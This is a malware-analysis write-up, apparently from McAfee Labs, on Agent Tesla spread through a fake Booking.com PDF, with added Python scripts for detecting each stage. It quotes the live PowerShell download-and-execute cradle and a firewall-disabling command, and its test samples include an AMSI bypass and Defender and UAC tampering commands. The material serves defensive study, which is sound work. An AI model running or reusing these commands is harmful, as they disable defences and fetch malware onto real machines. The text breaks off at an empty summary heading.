Thursday, November 7, 2024

Rise in Deceptive PDF: The Gateway to Malicious Payloads

Authored by Yashvi Shah and Preksha Saxena

McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF files. Malware is not sourced solely from dubious websites or downloads; it may also reside inside apparently innocuous emails, particularly within the PDF attachments accompanying them. The following trend, observed over the past three months through McAfee telemetry, shows the prevalence of malware distributed through non-portable executable (non-PE) vectors.

Figure 1: Rise in PDF malware

Why PDF?

Following Microsoft's macro-blocking measures for Internet-delivered Office files, threat actors were forced to devise alternative methods for email malware distribution. The complex structure of PDF files makes them susceptible to abuse and poses significant challenges for detecting malicious content inside them. As a file format commonly distributed via email attachments in the consumer space, PDFs are an attractive avenue for attackers to deceive users into believing they are benign. Exploiting this trust, attackers can readily craft PDF-based lures whose payloads are hosted on malicious websites. Upon user interaction, such as clicking a link, these PDFs download the hosted payload, exacerbating the risk of infection.

Infection Chain

This emerging infection chain, involving Agent Tesla among other families, begins with an email containing a PDF attachment, which subsequently facilitates the delivery of the final payload. In the old and unpatched version of Acrobat Reader, the PDF directly executes embedded JavaScript through MSHTA, which in turn launches PowerShell to carry out process injection. Conversely, in the latest version of Acrobat Reader, the PDF is unable to execute JavaScript directly. Instead, it redirects the user to a malicious website, from which the script is downloaded. The subsequent stages are the same in both cases. The kill chain for the delivery of Agent Tesla unfolds as follows:

Figure 2: Infection Chain

Initial Access:

First, we will address the scenario involving the updated version of Acrobat Reader, as it is likely that the majority of users have this version installed. Typically, these PDF files are disguised under various themes, such as invoices featuring a prominent download button, messages prompting immediate action, or buttons designed to redirect users to seemingly benign destinations.

In a recent attack, a file named "Booking.com-1728394029.pdf" was used. It evidently targets users under the guise of being affiliated with Booking.com. It displays a prompt stating, "Lettore non è compatibile!", which translates to "Reader is not compatible," as depicted in Figure 3 below.

Figure 3: Face of PDF attachment

Upon analyzing the internal structure of the PDF (Figure 4), we found that one of its seven objects contains some hex data and an embedded URL. The URL highlighted in the red box, "https://bit[.]ly/newbookingupdates", is a Bitly URL. Attackers use Bitly URLs to hide malicious links, making them harder to detect. This is especially useful in phishing schemes where they trick users into revealing sensitive information. Bitly's dynamic links allow attackers to change the destination after the lure is sent, enhancing their ability to evade detection. Additionally, attackers exploit the trust associated with Bitly to improve the success of their social engineering tactics.

This URL is intended to connect to https://bio0king[.]blogspot[.]com

Figure 4: Embedded data in PDF

The text highlighted in yellow in Figure 4 appears to be in hexadecimal format. Upon converting it to ASCII, the result is as follows:

Figure 5: ASCII conversion

This is the reason behind the prompt observed in Figure 3: the decoded text is the same alert message displayed upon opening the PDF document.
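The hex-to-ASCII step above is easy to automate. The following Python script, added here as an illustration and not part of McAfee's analysis tooling, walks the object table of a PDF, flags objects carrying /OpenAction, /JavaScript, /JS, /URI or /Launch entries, and decodes any PDF hex strings it finds. The PDF it scans is constructed inline to mimic the layout in Figure 4 (an alert stored as a hex string plus a URI action); the alert text, URL and object numbers are made up for the example and are not taken from the real attachment.

```python
"""Static triage of a PDF's object table for the indicators discussed above:
/OpenAction, /JavaScript and /JS entries, /URI link actions, and PDF hex
strings (<...>) decoded to ASCII as in Figure 5. Added example, not McAfee's
tooling; the PDF below is constructed to mimic the object layout in Figure 4
and is not the real Booking.com-*.pdf."""
import re
from typing import Dict

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
# PDF hex string <...>; the lookarounds keep << >> dictionary delimiters from matching.
HEX_STRING_RE = re.compile(rb"(?<!<)<([0-9A-Fa-f\s]+)>(?!>)")
URI_RE = re.compile(rb"/URI\s*\(([^)]*)\)")
# Names whose presence alone should send a PDF to deeper analysis.
ACTION_NAMES = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch",
                b"/SubmitForm", b"/EmbeddedFile")
ACTION_RES = [(n.decode(), re.compile(re.escape(n) + rb"(?![A-Za-z0-9])")) for n in ACTION_NAMES]

ALERT_JS = b'app.alert("Reader is not compatible!");'   # constructed stand-in for the Italian alert
# Constructed sample: an OpenAction whose JavaScript is stored as a hex string,
# plus a link annotation carrying a URI action. Not the real attachment.
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj\n"
    b"4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 200 50] "
    b"/A << /S /URI /URI (https://bit.ly/example-short-link) >> >> endobj\n"
    b"5 0 obj << /S /JavaScript /JS <" + ALERT_JS.hex().encode() + b"> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)


def decode_hex_string(raw: bytes) -> str:
    """Decode the inside of a PDF <...> hex string; a missing final digit counts as 0 (PDF 32000, 7.3.4.3)."""
    digits = re.sub(rb"\s+", b"", raw)
    if len(digits) % 2:
        digits += b"0"
    return bytes.fromhex(digits.decode("ascii")).decode("latin-1")


def scan_pdf(pdf: bytes) -> Dict[str, object]:
    """Walk every 'N G obj ... endobj' block and collect triage indicators."""
    report = {"objects": 0, "open_action": False, "uris": [],
              "decoded_hex": [], "javascript_objects": [], "flagged": {}}
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(3)
        report["objects"] += 1
        names = [label for label, rx in ACTION_RES if rx.search(body)]
        uris = [u.decode("latin-1") for u in URI_RE.findall(body)]
        decoded = [decode_hex_string(h) for h in HEX_STRING_RE.findall(body)]
        if "/OpenAction" in names:
            report["open_action"] = True
        if "/JavaScript" in names or "/JS" in names:
            report["javascript_objects"].append(num)
        report["uris"].extend(uris)
        report["decoded_hex"].extend(decoded)
        if names or uris or decoded:
            report["flagged"][num] = {"names": names, "uris": uris, "decoded_hex": decoded}
    return report


if __name__ == "__main__":
    result = scan_pdf(SAMPLE_PDF)
    for num, info in result["flagged"].items():
        print(f"obj {num}: {info}")
```

Real samples usually compress the interesting dictionaries inside FlateDecode streams or spell names with #-escapes (/J#61vaScript), so in practice inflate streams with zlib and normalize names before matching; treat a scan like this as the first pass that decides whether a PDF deserves a look in a proper parser, not as a verdict.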

After clicking "OK," another prompt appeared from Adobe Reader, cautioning about the connection being established to the address mentioned in the prompt, i.e. "bit.ly".

Figure 6: Connection to embedded URL

Upon granting permission for the redirection, the user is directed to the website "https://bio0king[.]blogspot[.]com", which attempts to pass itself off as a legitimate Booking.com website. As illustrated in the figure below, Microsoft Defender SmartScreen alerts the user to the harmful nature of this website. Despite the warning, further analysis was conducted by proceeding to the website to observe subsequent actions.

Figure 7: Connection to disguised website

Upon accessing the website, we observed that a JavaScript file named "Booking.com-1728394029.js" was promptly downloaded. The .js file was deliberately named identically to the PDF file in an effort to deceive users into opening it.

Figure 8: Prompt of JS file download

Immediately upon initiating the download, a redirection to the legitimate Booking.com website is triggered, aiming to prevent users from noticing any suspicious activity. The downloaded file is saved in the Downloads folder on the user's system.

Figure 9: JS file downloaded

The content of the JavaScript file is heavily obfuscated. This tactic is commonly employed by attackers to conceal their code, complicating analysis and evading detection mechanisms.

Figure 10: JS file content

Execution:

Upon executing the JavaScript, the following process tree was observed:

Figure 11: Process tree

Command line:

  • "C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\Booking.com-1728394029.js"
    • "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25.blogspot.com/////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 5
      • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      • "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\mk2qsd2s.cmdline"
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES6D2D.tmp" "c:\Users\admin\AppData\Local\Temp\CSC7C83DF075A344945AED4D733783D6D80.TMP"
      • "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
      • "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Upon decoding and executing "Booking.com-1728394029.js," a URL was obtained: "htloctmain25.blogspot.com/////////////////////////atom.xml."

Through the PowerShell command line, the script fetches the file located at htloctmain25.blogspot.com/////////////////////////atom.xml with Invoke-RestMethod (irm) and executes it with Invoke-Expression (iex). In this instance, the attackers obfuscated the Invoke-Expression command: the string 'i*x' has its '*' replaced with 'e' at run time, yielding 'iex', which is then invoked through the dot-sourcing operator, so the literal token "iex" never appears in the command line. The command also runs with -ep Bypass to sidestep the execution policy and forces TLS 1.2 before the download. As illustrated in the command line, a sleep command was implemented, pausing execution for 5 seconds. Subsequent stages of the infection proceeded after this interval.
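To make the PowerShell stage above machine-readable, the following Python snippet, added for this article and not McAfee's own tooling, normalizes the observed command line (evaluating the ('i*x').replace('*','e') trick, resolving the dot-source operator and expanding aliases) and then lists the reasons it looks like a download cradle. The alias table is a hand-picked subset of PowerShell's built-in aliases, the regexes target the specific tricks on this page rather than every obfuscation scheme, and the benign control command line is constructed.

```python
"""Normalize and classify an obfuscated PowerShell command line of the kind
seen in the process tree above. Added example, not McAfee's tooling; the
alias table is a hand-picked subset of PowerShell's built-in aliases and the
regexes target the tricks on this page, not every obfuscation scheme."""
import re
from typing import Dict, List

# Subset of PowerShell's built-in aliases commonly abused in download cradles.
ALIASES = {
    "iex": "Invoke-Expression", "irm": "Invoke-RestMethod",
    "iwr": "Invoke-WebRequest", "curl": "Invoke-WebRequest",
    "wget": "Invoke-WebRequest",
}

# ('i*x').replace('*','e')  ->  ('iex'); double quotes and chained .replace() are handled too.
STRING_REPLACE = re.compile(
    r"""\(\s*(['"])(.*?)\1\s*\)\s*\.replace\(\s*(['"])(.*?)\3\s*,\s*(['"])(.*?)\5\s*\)""",
    re.I)
# "| . ('iex')" or "| & iex": the dot-source / call operator applied to a command name.
DOT_OR_CALL = re.compile(r"""\|\s*[.&]\s*\(?\s*(['"]?)(\w[\w-]*)\1\s*\)?""")
# First argument of a web cmdlet, with or without -Uri and quotes.
WEB_CMDLET_ARG = re.compile(
    r"""Invoke-(?:RestMethod|WebRequest)\s+(?:-Uri\s+)?['"]?([^\s'")]+)""", re.I)
ALIAS_RE = re.compile(r"\b(" + "|".join(map(re.escape, ALIASES)) + r")\b", re.I)

# Command line observed in the process tree above, kept verbatim.
OBSERVED = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c '
            r"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;"
            r"$(irm htloctmain25.blogspot.com/////////////////////////atom.xml) | . ('i*x').replace('*','e');"
            r"Start-Sleep -Seconds 5")
# Constructed benign control: an ordinary administrative invocation.
BENIGN = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command Get-Service -Name Spooler'


def resolve_string_replaces(cmd: str) -> str:
    """Evaluate literal ('a*b').replace('*','c') expressions until none remain."""
    while True:
        m = STRING_REPLACE.search(cmd)
        if not m:
            return cmd
        literal, old, new = m.group(2), m.group(4), m.group(6)
        cmd = cmd[:m.start()] + "(" + repr(literal.replace(old, new)) + ")" + cmd[m.end():]


def normalize(cmd: str) -> str:
    """Undo the obfuscation layers: string rebuilds, dot-source/call operator, aliases."""
    cmd = resolve_string_replaces(cmd)
    cmd = DOT_OR_CALL.sub(lambda m: "| " + ALIASES.get(m.group(2).lower(), m.group(2)), cmd)
    return ALIAS_RE.sub(lambda m: ALIASES[m.group(1).lower()], cmd)


def classify(cmd: str) -> Dict[str, object]:
    """Return the normalized command, the URL it fetches (if any), and why it looks like a cradle."""
    norm = normalize(cmd)
    reasons: List[str] = []
    if re.search(r"-e(?:p|x(?:ec(?:utionpolicy)?)?)\s+bypass", cmd, re.I):
        reasons.append("execution policy bypass")
    if STRING_REPLACE.search(cmd):
        reasons.append("command name rebuilt with string .replace()")
    fetch = WEB_CMDLET_ARG.search(norm)
    urls = [fetch.group(1)] if fetch else []
    if fetch and re.search(r"\bInvoke-Expression\b", norm, re.I):
        reasons.append("remote content piped to Invoke-Expression (download cradle)")
    if re.search(r"SecurityProtocolType\]::Tls1", cmd):
        reasons.append("forces TLS version before download (common cradle boilerplate)")
    if any("///" in u for u in urls):
        reasons.append("URL path padded with repeated slashes")
    if re.search(r"\bStart-Sleep\b", norm, re.I):
        reasons.append("sleeps after execution")
    return {"normalized": norm, "urls": urls, "reasons": reasons}


if __name__ == "__main__":
    for label, cmd in (("observed", OBSERVED), ("benign", BENIGN)):
        result = classify(cmd)
        print(label, "->", result["normalized"])
        for reason in result["reasons"]:
            print("   ", reason)
```

Normalizing before matching is the point: a rule that looks for the literal "iex" misses this command line, while a rule run over the normalized form sees "Invoke-RestMethod ... | Invoke-Expression" directly.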

The file hosted at http://htloctmain25.blogspot.com/////////////////////////atom.xml is named atom.ps1 and is approximately 5.5 MB in size. The figure below depicts the content of the file:

Figure 12: Content of .ps1 file

Let's begin deciphering the script shown in Figure 12, using the color coding in that figure for reference:

The Red marked content at the top of the script indicates that it will terminate several specified processes ("RegSvcs", "mshta", "wscript", "msbuild", "FoxitPDFReader"), presumably with the intention of injecting the final payload into one of these legitimate binaries. Additionally, the script creates a directory at "C:\ProgramData\MINGALIES" for potential future use.

The Blue marked content within the script is the decryption function, labeled "asceeeeeeeeeeeeeeee". This function is subsequently used to decrypt various variables within the script.

The Green marked content towards the end of the script implements the persistence mechanism and describes the injection process into legitimate executables.

For reference and ease of comprehension, the variables defined in the script have been numbered. The decryption instructions for these variables are highlighted in Yellow for clarity and emphasis.

Following the sequence of instructions, once the specified processes have been terminated, the script defines variables 1 and 2. Next, the decryption loop is defined. After the decryption loop, variable 3, named "Phudigum", is defined. The script then decrypts variable 3 and executes the resulting decoded data using the Invoke-Expression (IEX) command.

Defense Evasion:

The content of the decoded variable 3 is as follows:

Figure 13: Variable 3 after decryption

The code first bypasses the Microsoft Windows Antimalware Scan Interface (AMSI) by setting a specific value, and then creates registry entries for persistence. The script also defines functions for interacting with the system's memory and sets the global error action preference to SilentlyContinue, suppressing any errors. It checks whether a type named AMSIReaper exists and, if not, defines this type with various declarations for interacting with the Windows kernel32.dll, including functions related to process memory manipulation.

Furthermore, the script executes a series of actions aimed at weakening the security of the system. It begins by adding exclusions for specific file extensions, paths, and processes in Windows Defender, so that these items are no longer scanned. Next, it attempts to modify various Windows Defender preferences, disabling critical protection features such as the Intrusion Prevention System, Real-time Monitoring, and Script Scanning, while also adjusting settings related to threat actions and reporting. Additionally, the script tries to modify registry settings associated with User Account Control (UAC) and disables the Windows Firewall (the netsh advfirewall command visible in the process tree), further weakening the system's defenses. Finally, it resets the global error action preference to Continue, concealing any errors encountered during execution. Overall, these actions indicate a concerted effort to disable the system's defenses before the payload is delivered.
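The Defender and UAC tampering described above leaves distinctive strings in the decrypted script, which makes it a good candidate for a simple rule set. The Python scanner below, added here as an example and not taken from the analysis, flags those commands line by line and maps each to its MITRE ATT&CK technique. The script it scans is constructed to exercise every rule and is not the sample's decrypted variable 3; in particular, the AMSI rule keys on the widely documented amsiInitFailed reflection trick as one form of "setting a value", which is an assumption about the form rather than a claim about what this sample used.

```python
"""Flag the defense-evasion commands described above (AMSI tampering,
Defender exclusions and disabled features, UAC and firewall changes) in a
decrypted PowerShell script. Added example, not McAfee's tooling. The script
below is constructed to exercise the rules and is not the decrypted
variable 3; the AMSI rule keys on the widely documented amsiInitFailed
reflection trick, an assumption about the form and not a claim about this sample."""
import re
from typing import List, NamedTuple


class Rule(NamedTuple):
    name: str
    technique: str          # MITRE ATT&CK technique ID, or "" where none fits
    pattern: "re.Pattern[str]"


RULES = [
    Rule("AMSI bypass via reflection", "T1562.001",
         re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I)),
    Rule("Defender exclusion added", "T1562.001",
         re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Extension|Process|IpAddress)", re.I)),
    Rule("Defender feature disabled", "T1562.001",
         re.compile(r"Set-MpPreference\b.*-Disable\w+\s+(?:\$true|1)\b", re.I)),
    Rule("UAC disabled via EnableLUA", "T1548.002",
         re.compile(r"EnableLUA\b.*(?:-Value\s+|/d\s+|=\s*)0\b", re.I)),
    Rule("Windows Firewall disabled", "T1562.004",
         re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off"
                    r"|Set-NetFirewallProfile\b.*-Enabled\s+False", re.I)),
    Rule("error suppression (low signal alone)", "",
         re.compile(r"\$ErrorActionPreference\s*=\s*['\"]SilentlyContinue", re.I)),
]
DISABLED_FLAG = re.compile(r"-(Disable\w+)\s+(?:\$true|1)\b", re.I)


class Finding(NamedTuple):
    line_no: int
    rule: str
    technique: str
    detail: str


def scan_script(text: str) -> List[Finding]:
    """Run every rule over every line; returns one Finding per (line, rule) hit."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for rule in RULES:
            if not rule.pattern.search(line):
                continue
            detail = line.strip()
            if rule.name == "Defender feature disabled":
                detail = ", ".join(DISABLED_FLAG.findall(line))   # which features were turned off
            findings.append(Finding(line_no, rule.name, rule.technique, detail))
    return findings


# Constructed script exercising each rule (not the sample's decrypted variable 3).
# The last Set-MpPreference line re-enables a feature and must not fire.
SAMPLE_SCRIPT = r"""
$ErrorActionPreference = 'SilentlyContinue'
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Add-MpPreference -ExclusionExtension '.ps1','.exe' -ExclusionPath 'C:\ProgramData' -ExclusionProcess 'RegSvcs.exe'
Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableIntrusionPreventionSystem $true
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name EnableLUA -Value 0
netsh advfirewall set allprofiles state off
Set-MpPreference -DisableRealtimeMonitoring $false
$ErrorActionPreference = 'Continue'
"""

if __name__ == "__main__":
    for f in scan_script(SAMPLE_SCRIPT):
        tag = f" [{f.technique}]" if f.technique else ""
        print(f"line {f.line_no}: {f.rule}{tag}: {f.detail}")
```

The error-suppression rule is kept deliberately weak: administrators set $ErrorActionPreference all the time, so it only adds weight when it appears next to the other hits, which is exactly the combination this script shows.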

Privilege Escalation:

The next instruction in Figure 12 decrypts variable 2, labeled "bulgumchupitum," using the decryption function "asceeeeeeeeeeeeeeee", and the result is likewise executed with the Invoke-Expression (IEX) command. The following is the decoded content of variable 2:

Figure 14: Variable 2 after decryption

The content obtained after decrypting variable 2 is of particular significance. The section highlighted in Red does the following:

  • Introduces another decryption function specifically tailored for this script, named "kimkarden."
  • The variable "muthal," marked as variable 1 in Figure 12, is used within this script rather than in the main .ps1 file.
  • Another variable is defined, and its content is stored in the variable "pinchs."
  • Finally, the content of both variables, "muthal" and "pinchs," is decrypted using the decryption function "kimkarden" and stored as byte arrays in data 1 and data 2, marked as 5 and 6, respectively, in Figure 14.
  • Data 1 and Data 2 are found to be .NET executables.

The next section, marked Blue in Figure 14, does the following:

  • After a brief sleep, the script loads an assembly from the decoded content, data 1, and executes a command via reflection.
  • The script defines a function named ExecuteCommand, which uses reflection to dynamically invoke method 'C' from a type named 'A.B' loaded from that assembly.
  • It defines paths to various .NET Framework executables (RegSvcs.exe for versions 2.0 and 4.0, and MSBuild.exe for version 3.5).
  • It invokes $invokeMethod with $nullArray and two parameters: the path of the .NET Framework executable and $data2 (the decoded byte array).

Process Injection:

Figure 15: Data 1

Data 1 is a .NET DLL file. As previously indicated, the script invokes the method 'C' from the type named 'A.B'. Despite the high level of obfuscation in the file shown in Figure 16, the presence of method 'C' can be observed (highlighted in yellow). Additionally, within the script, there is a specific function where the path to the framework executable and the data are passed (highlighted within the red box).

Figure 16: Data 1 dll

This DLL is responsible for injecting data2, which is Agent Tesla, as a payload into the RegSvcs.exe process. The following figure shows the configuration of data2. The configuration depicted in Figure 17 disguises data2 as a legitimate McAfee package file. However, it lacks a valid certificate, indicating its fraudulent nature.

Figure 17: Data2

The executable exhibits a high degree of obfuscation, rendering its content largely unreadable. Numerous methods are present, each bearing meaningless names, a deliberate tactic employed to impede analysis by researchers.

Figure 18: Data2 exe

Discovery:

The attackers have intricately orchestrated the obfuscation. Each string is decrypted through a sequence of instructions, with specific parameters passed to obtain the deciphered content. This approach is designed to add layers of complexity and hinder straightforward analysis. For instance, in Figure 19, through reverse engineering, we can observe how the malware begins querying the system for browser information. The highlighted instruction is the one that, after decryption, yields the path of the Opera browser.

Figure 19: Fetching browser information

The following ProcMon logs show all the browsers the malware queried:

Figure 20: Procmon logs of browsers (1)

Figure 21: Procmon logs of browsers (2)

Credential Access:

In addition to this, it steals sensitive information such as browser history, cookies, credentials, SMTP information, session information, and email client data such as Outlook profiles.

Figure 22: Credentials

Exfiltration:

By debugging the code, we were able to uncover the domain it was using for exfiltration. The following figure shows the URL used for exfiltration:

Figure 23: Domain obtained

The same was evident from the Procmon logs shown in the figure below:

Figure 24: Procmon logs of connection for exfiltration

The DNS record of IP address 149.154.167.220 belongs to Telegram Messenger.

Figure 25: DNS record

AgentTesla leverages Telegram bots for data exfiltration for several reasons. Firstly, Bot API traffic travels over HTTPS to Telegram's servers, so the stolen data is encrypted in transit and not visible to network inspection. Secondly, the platform offers anonymity for bot creators, enhancing the stealth of malicious activities. Thirdly, Telegram's simple interface and Bot API make it easy for attackers to operate the channel without hosting their own command-and-control infrastructure. Additionally, since Telegram is a widely used messaging platform, traffic to its servers may appear less suspicious than traffic to other channels, aiding in evading detection. Moreover, Telegram's infrastructure resilience makes it a reliable option for maintaining communication channels even amid takedown efforts.

Overall, the combination of transport security, anonymity, ease of use, stealth, and resilience makes Telegram bots an appealing choice for AgentTesla's data exfiltration. To achieve this, the malware contacts the domain associated with the bot and transmits the data, which is then attributed to a specific bot ID.

Figure 26: Telegram bot for exfiltration

In a nutshell, this script was tasked with decoding the payload, retrieving legitimate .NET executable paths, performing process injection to execute the malware, collecting data, and ultimately exfiltrating the acquired information.

Persistence:

Moving on with atom.ps1 (Figure 12), the next item is variable 4, labeled "koaskodkwllWWW", which is decrypted using the function "asceeeeeeeeeeeeeeee". Upon decryption, the content is as follows:

Figure 27: Variable 4 decoded

This script establishes persistence by:

  1. Creating an HTA script to execute PowerShell commands fetched remotely. The HTA contains JavaScript code that uses ActiveX objects to execute commands. Specifically, it creates an instance of WScript.Shell to run a PowerShell command fetched from a remote location (linkcomsexi).
  2. Registering a scheduled task named "Tnamesexi" using Register-ScheduledTask. The task is set to trigger once at a specific time, calculated by adding a certain number of minutes (mynsexi) to the current time.
  3. Finally, setting a registry value under the current user's Run key (HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run). This registry value, named "Tnamesexi," is configured to execute the command schtasks /run /tn $taskName, thereby triggering the scheduled task established in the preceding step at every logon.

Ultimately, the content highlighted in green in Figure 12 performs the final task. The instructions are as follows:

Figure 28: Persistence instructions

Now, after substituting the values:

  • "mynsexi" is set to "213", indicating that the script will be executed again after 213 minutes.
  • "Tnamesexi" is defined as "chromeupdateri", implying that a Run entry will be created under this name.
  • "linkcomsexi" is assigned the value "htljan62024.blogspot.com//////////atom.xml", suggesting that the atom.ps1 file will be fetched again from this URL.

We inspected the registry entries and scheduled task entries for cross-verification, and the script did as directed:

Figure 29: Registry entry for persistence

Figure 30: Task Scheduler

Figure 31: Procmon logs for persistence

In summary, the script is configured to execute again after 213 minutes, creating a Run entry named "chromeupdateri" and fetching the atom.ps1 file again from "htljan62024.blogspot.com//////////atom.xml".
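The Run-key-to-scheduled-task chain above is unusual enough to hunt for. The Python script below, added as an example and not part of McAfee's write-up, parses a Task Scheduler XML export and a .reg export of the HKCU Run key, flags tasks whose action is a script host launching a script from a user-writable path, and flags Run values that do nothing but call schtasks /run. The exports are constructed to mirror Figures 29 and 30 (task name chromeupdateri, an HTA under the user's Temp folder, and a benign OneDrive entry as a control) rather than copied from the analysts' machine.

```python
"""Audit Task Scheduler XML exports and an HKCU Run-key export for the
persistence chain described above: a Run value that does nothing but
'schtasks /run /tn <task>', and a task whose action is a script host
launching a script from a user-writable path. Added example, not McAfee's
tooling; the exports below are constructed to mirror Figures 29 and 30 and
are not the analysts' data."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe", "msbuild.exe"}
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Downloads|Public)\\", re.I)
SCRIPT_OR_URL = re.compile(r"\.(?:hta|js|jse|vbs|vbe|ps1|bat|cmd)\b|https?://", re.I)
SCHTASKS_RUN = re.compile(r"schtasks(?:\.exe)?\s+/run\s+/tn\s+\"?([^\s\"]+)", re.I)

# Constructed output of `schtasks /query /tn chromeupdateri /xml` (not the real export).
SAMPLE_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <StartBoundary>2024-05-02T13:45:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>mshta.exe</Command>
      <Arguments>C:\Users\admin\AppData\Local\Temp\chromeupdateri.hta</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed output of `reg export HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` (not the real one).
SAMPLE_RUN_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"chromeupdateri"="schtasks /run /tn chromeupdateri"
'''


def parse_run_key(reg_text: str) -> Dict[str, str]:
    """Return {value name: command} from a .reg export, undoing the \\ and \" escaping."""
    return {name: value.replace('\\"', '"').replace("\\\\", "\\")
            for name, value in re.findall(r'^"([^"]+)"="(.*)"$', reg_text, re.M)}


def _basename(command: str) -> str:
    """Lower-case file name of the program a command line starts with (quoted or not)."""
    if not command.strip():
        return ""
    first = command.split('"')[1] if command.startswith('"') else command.split()[0]
    return re.split(r"[\\/]", first)[-1].lower()


def audit_task(xml_text: str) -> List[str]:
    """Reasons a task export looks like the persistence stage above."""
    root = ET.fromstring(re.sub(r"^<\?xml[^>]*\?>", "", xml_text.strip()).strip())
    reasons = []
    for exec_node in root.iterfind("t:Actions/t:Exec", TASK_NS):
        cmd = (exec_node.findtext("t:Command", "", TASK_NS) or "").strip()
        args = exec_node.findtext("t:Arguments", "", TASK_NS) or ""
        if _basename(cmd) in SCRIPT_HOSTS:
            reasons.append(f"action runs script host {_basename(cmd)}")
        if USER_WRITABLE.search(args) and SCRIPT_OR_URL.search(args):
            reasons.append("action argument is a script under a user-writable path")
        elif "://" in args:
            reasons.append("action argument contains a URL")
    if (root.find("t:Triggers/t:TimeTrigger", TASK_NS) is not None
            and root.find("t:Triggers/t:TimeTrigger/t:Repetition", TASK_NS) is None):
        reasons.append("one-shot TimeTrigger with no repetition (re-armed by something else?)")
    return reasons


def audit(tasks: Dict[str, str], reg_text: str) -> List[dict]:
    """Correlate Run-key values with task exports; one finding per suspicious item."""
    findings = []
    for name, xml_text in tasks.items():
        findings += [{"source": "task", "name": name, "reason": r} for r in audit_task(xml_text)]
    for name, command in parse_run_key(reg_text).items():
        m = SCHTASKS_RUN.search(command)
        if m:
            target = m.group(1)
            known = "registered" if target in tasks else "unknown"
            findings.append({"source": "run", "name": name,
                             "reason": f"Run value chains to {known} task '{target}' via schtasks /run"})
        elif _basename(command) in SCRIPT_HOSTS and SCRIPT_OR_URL.search(command):
            findings.append({"source": "run", "name": name,
                             "reason": f"Run value launches {_basename(command)} with a script or URL"})
    return findings


if __name__ == "__main__":
    for f in audit({"chromeupdateri": SAMPLE_TASK_XML}, SAMPLE_RUN_REG):
        print(f"[{f['source']}] {f['name']}: {f['reason']}")
```

On a live host the same checks run against `schtasks /query /xml` output and `reg export` of the Run key; the point of correlating the two is that neither artifact looks alarming on its own, while a Run value whose only job is to fire a one-shot task that launches mshta from Temp is the exact shape described above.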

Execution with an outdated and unpatched version of Acrobat Reader:

Upon opening the PDF in the old, unpatched version of Acrobat Reader, a prompt immediately appeared indicating the launch of MSHTA along with the entire JavaScript code contained therein. This is depicted in the figure below.

Figure 32: Prompt for embedded JavaScript

Upon analyzing the streams of the PDF, we found the identical script embedded within the document:

Figure 33: Embedded JavaScript in PDF

After MSHTA launches, an instance of PowerShell is invoked, which performs the process injection into RegSvcs.exe and the injection of AgentTesla. Consequently, with an outdated and unpatched version of Acrobat Reader, no interaction with the PDF beyond opening it is necessary; merely opening the file results in the system being infected.

Summary:

